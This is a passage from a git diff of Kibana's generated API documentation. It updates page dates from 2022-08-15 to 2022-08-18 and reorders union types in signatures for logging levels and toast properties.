'@kbn/core-http-server-mocks'] --- import kbnCoreHttpServerMocksObj from './kbn_core_http_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_i18n_browser.mdx b/api_docs/kbn_core_i18n_browser.mdx index 1a8cdbe8ee477..90e96c6c118d8 100644 --- a/api_docs/kbn_core_i18n_browser.mdx +++ b/api_docs/kbn_core_i18n_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-i18n-browser title: "@kbn/core-i18n-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-i18n-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-i18n-browser'] --- import kbnCoreI18nBrowserObj from './kbn_core_i18n_browser.devdocs.json'; diff --git a/api_docs/kbn_core_i18n_browser_mocks.mdx b/api_docs/kbn_core_i18n_browser_mocks.mdx index 3e7c3757c33e4..2e4ef5b542f67 100644 --- a/api_docs/kbn_core_i18n_browser_mocks.mdx +++ b/api_docs/kbn_core_i18n_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-i18n-browser-mocks title: "@kbn/core-i18n-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-i18n-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-i18n-browser-mocks'] --- import kbnCoreI18nBrowserMocksObj from './kbn_core_i18n_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_injected_metadata_browser.mdx b/api_docs/kbn_core_injected_metadata_browser.mdx index 57de3fb2d0fc0..212902d7e4e7e 100644 --- a/api_docs/kbn_core_injected_metadata_browser.mdx +++ b/api_docs/kbn_core_injected_metadata_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-injected-metadata-browser title: "@kbn/core-injected-metadata-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-injected-metadata-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-injected-metadata-browser'] --- import kbnCoreInjectedMetadataBrowserObj from './kbn_core_injected_metadata_browser.devdocs.json'; diff --git a/api_docs/kbn_core_injected_metadata_browser_mocks.mdx b/api_docs/kbn_core_injected_metadata_browser_mocks.mdx index 660411ca263bc..38915a3a459f3 100644 --- a/api_docs/kbn_core_injected_metadata_browser_mocks.mdx +++ b/api_docs/kbn_core_injected_metadata_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-injected-metadata-browser-mocks title: "@kbn/core-injected-metadata-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-injected-metadata-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-injected-metadata-browser-mocks'] --- import kbnCoreInjectedMetadataBrowserMocksObj from './kbn_core_injected_metadata_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_integrations_browser_internal.mdx b/api_docs/kbn_core_integrations_browser_internal.mdx index fa34eeba34ab9..0eedb643ab42f 100644 --- a/api_docs/kbn_core_integrations_browser_internal.mdx +++ b/api_docs/kbn_core_integrations_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-integrations-browser-internal title: "@kbn/core-integrations-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-integrations-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-integrations-browser-internal'] --- import kbnCoreIntegrationsBrowserInternalObj from './kbn_core_integrations_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_integrations_browser_mocks.mdx b/api_docs/kbn_core_integrations_browser_mocks.mdx index d8ab976b9d594..b9b0844ea2371 100644 --- a/api_docs/kbn_core_integrations_browser_mocks.mdx +++ b/api_docs/kbn_core_integrations_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-integrations-browser-mocks title: "@kbn/core-integrations-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-integrations-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-integrations-browser-mocks'] --- import kbnCoreIntegrationsBrowserMocksObj from './kbn_core_integrations_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_logging_server.devdocs.json b/api_docs/kbn_core_logging_server.devdocs.json index 1c62152f792f8..0e4ef7660c429 100644 --- a/api_docs/kbn_core_logging_server.devdocs.json +++ b/api_docs/kbn_core_logging_server.devdocs.json @@ -203,7 +203,7 @@ "label": "level", "description": [], "signature": [ - "\"error\" | \"all\" | \"off\" | \"info\" | \"debug\" | \"trace\" | \"warn\" | \"fatal\"" + "\"error\" | \"all\" | \"info\" | \"debug\" | \"off\" | \"trace\" | \"warn\" | \"fatal\"" ], "path": "packages/core/logging/core-logging-server/src/logger.ts", "deprecated": false diff --git a/api_docs/kbn_core_logging_server.mdx b/api_docs/kbn_core_logging_server.mdx index d6c88c2d4bb8f..df61fe79dc1fd 100644 --- a/api_docs/kbn_core_logging_server.mdx +++ b/api_docs/kbn_core_logging_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-logging-server title: "@kbn/core-logging-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-logging-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-logging-server'] --- import kbnCoreLoggingServerObj from './kbn_core_logging_server.devdocs.json'; diff --git a/api_docs/kbn_core_logging_server_internal.devdocs.json b/api_docs/kbn_core_logging_server_internal.devdocs.json index 7b04157c02296..dbef8abb628d9 100644 --- a/api_docs/kbn_core_logging_server_internal.devdocs.json +++ b/api_docs/kbn_core_logging_server_internal.devdocs.json @@ -142,7 +142,7 @@ "AppenderConfigType", ">>; loggers: ", "Type", - "[]>; }>" + "[]>; }>" ], "path": "packages/core/logging/core-logging-server-internal/src/logging_config.ts", "deprecated": false, @@ -165,7 +165,7 @@ "Type", "; level: ", "Type", - "<\"error\" | \"all\" | \"off\" | \"info\" | \"debug\" | \"trace\" | \"warn\" | \"fatal\">; }>" + "<\"error\" | \"all\" | \"info\" | \"debug\" | \"off\" | \"trace\" | \"warn\" | \"fatal\">; }>" ], "path": "packages/core/logging/core-logging-server-internal/src/logging_config.ts", "deprecated": false, diff --git a/api_docs/kbn_core_logging_server_internal.mdx b/api_docs/kbn_core_logging_server_internal.mdx index b2f0d4a6cffde..fad2de8fab367 100644 --- a/api_docs/kbn_core_logging_server_internal.mdx +++ b/api_docs/kbn_core_logging_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-logging-server-internal title: "@kbn/core-logging-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-logging-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-logging-server-internal'] --- import kbnCoreLoggingServerInternalObj from './kbn_core_logging_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_logging_server_mocks.mdx b/api_docs/kbn_core_logging_server_mocks.mdx index e282d96f0006e..20caac82f206c 100644 --- a/api_docs/kbn_core_logging_server_mocks.mdx +++ b/api_docs/kbn_core_logging_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-logging-server-mocks title: "@kbn/core-logging-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-logging-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-logging-server-mocks'] --- import kbnCoreLoggingServerMocksObj from './kbn_core_logging_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_metrics_collectors_server_internal.mdx b/api_docs/kbn_core_metrics_collectors_server_internal.mdx index df8bd667a5acc..49108ef5e2a0a 100644 --- a/api_docs/kbn_core_metrics_collectors_server_internal.mdx +++ b/api_docs/kbn_core_metrics_collectors_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-metrics-collectors-server-internal title: "@kbn/core-metrics-collectors-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-metrics-collectors-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-metrics-collectors-server-internal'] --- import kbnCoreMetricsCollectorsServerInternalObj from './kbn_core_metrics_collectors_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_metrics_collectors_server_mocks.mdx b/api_docs/kbn_core_metrics_collectors_server_mocks.mdx index 74e146843f8e5..e4b5d67a6ad1a 100644 --- a/api_docs/kbn_core_metrics_collectors_server_mocks.mdx +++ b/api_docs/kbn_core_metrics_collectors_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-metrics-collectors-server-mocks title: "@kbn/core-metrics-collectors-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-metrics-collectors-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-metrics-collectors-server-mocks'] --- import kbnCoreMetricsCollectorsServerMocksObj from './kbn_core_metrics_collectors_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_metrics_server.mdx b/api_docs/kbn_core_metrics_server.mdx index a6f21962c0fd7..34ebadec44071 100644 --- a/api_docs/kbn_core_metrics_server.mdx +++ b/api_docs/kbn_core_metrics_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-metrics-server title: "@kbn/core-metrics-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-metrics-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-metrics-server'] --- import kbnCoreMetricsServerObj from './kbn_core_metrics_server.devdocs.json'; diff --git a/api_docs/kbn_core_metrics_server_internal.mdx b/api_docs/kbn_core_metrics_server_internal.mdx index cf3749fdcef2e..14eda75024241 100644 --- a/api_docs/kbn_core_metrics_server_internal.mdx +++ b/api_docs/kbn_core_metrics_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-metrics-server-internal title: "@kbn/core-metrics-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-metrics-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-metrics-server-internal'] --- import kbnCoreMetricsServerInternalObj from './kbn_core_metrics_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_metrics_server_mocks.mdx b/api_docs/kbn_core_metrics_server_mocks.mdx index 10d5279ff8891..bd4d83dc07934 100644 --- a/api_docs/kbn_core_metrics_server_mocks.mdx +++ b/api_docs/kbn_core_metrics_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-metrics-server-mocks title: "@kbn/core-metrics-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-metrics-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-metrics-server-mocks'] --- import kbnCoreMetricsServerMocksObj from './kbn_core_metrics_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_mount_utils_browser.mdx b/api_docs/kbn_core_mount_utils_browser.mdx index d346a41082137..c857da0442363 100644 --- a/api_docs/kbn_core_mount_utils_browser.mdx +++ b/api_docs/kbn_core_mount_utils_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-mount-utils-browser title: "@kbn/core-mount-utils-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-mount-utils-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-mount-utils-browser'] --- import kbnCoreMountUtilsBrowserObj from './kbn_core_mount_utils_browser.devdocs.json'; diff --git a/api_docs/kbn_core_mount_utils_browser_internal.mdx b/api_docs/kbn_core_mount_utils_browser_internal.mdx index 47eb8f3f6f449..6b1a0710d32fc 100644 --- a/api_docs/kbn_core_mount_utils_browser_internal.mdx +++ b/api_docs/kbn_core_mount_utils_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-mount-utils-browser-internal title: "@kbn/core-mount-utils-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-mount-utils-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-mount-utils-browser-internal'] --- import kbnCoreMountUtilsBrowserInternalObj from './kbn_core_mount_utils_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_node_server.mdx b/api_docs/kbn_core_node_server.mdx index dbf21e5f98632..557383657b3a1 100644 --- a/api_docs/kbn_core_node_server.mdx +++ b/api_docs/kbn_core_node_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-node-server title: "@kbn/core-node-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-node-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-node-server'] --- import kbnCoreNodeServerObj from './kbn_core_node_server.devdocs.json'; diff --git a/api_docs/kbn_core_node_server_internal.mdx b/api_docs/kbn_core_node_server_internal.mdx index 375cb82e65f42..b401f4bfabee6 100644 --- a/api_docs/kbn_core_node_server_internal.mdx +++ b/api_docs/kbn_core_node_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-node-server-internal title: "@kbn/core-node-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-node-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-node-server-internal'] --- import kbnCoreNodeServerInternalObj from './kbn_core_node_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_node_server_mocks.mdx b/api_docs/kbn_core_node_server_mocks.mdx index d60ea056fadfc..1ed4cb3d1c384 100644 --- a/api_docs/kbn_core_node_server_mocks.mdx +++ b/api_docs/kbn_core_node_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-node-server-mocks title: "@kbn/core-node-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-node-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-node-server-mocks'] --- import kbnCoreNodeServerMocksObj from './kbn_core_node_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_notifications_browser.devdocs.json b/api_docs/kbn_core_notifications_browser.devdocs.json index f0a942c2a5226..bab2a6417b824 100644 --- a/api_docs/kbn_core_notifications_browser.devdocs.json +++ b/api_docs/kbn_core_notifications_browser.devdocs.json @@ -651,7 +651,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", @@ -696,7 +696,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | 